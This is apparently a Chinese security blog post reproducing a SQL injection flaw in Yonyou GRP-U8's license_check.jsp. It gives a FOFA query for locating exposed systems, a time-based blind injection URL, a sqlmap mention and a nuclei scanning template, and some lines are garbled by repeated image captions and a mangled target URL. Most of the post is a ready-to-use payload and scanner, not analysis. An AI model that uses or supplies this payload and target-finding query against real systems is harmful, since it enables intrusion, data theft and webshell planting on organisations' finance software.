用友 GRP-U8 存在sql注入漏洞复现

这篇具有很好参考价值的文章主要介绍了用友 GRP-U8 存在sql注入漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa：app=”用友-GRP-U8”

用友 GRP-U8 存在sql注入漏洞复现,漏洞复现,sql,数据库

0x02 POC:

/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—

用友 GRP-U8 存在sql注入漏洞复现,漏洞复现,sql,数据库

0x03 sqlmap 一把梭哈

用友 GRP-U8 存在sql注入漏洞复现,漏洞复现,sql,数据库

0x04 nuclei poc

命令：nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -u Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者

用友 GRP-U8 存在sql注入漏洞复现,漏洞复现,sql,数据库

id: u8grp_license_check
info:
name: 用友GRP-U8 License Check漏洞
author: YourName
severity: high

requests:
- method: GET
path:
- "{{BaseURL}}/u8qx/license_check.jsp?kjnd=1';WAITFOR%20DELAY%20'0:0:3'--"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "1")'
condition: and

还没看够？可以关注~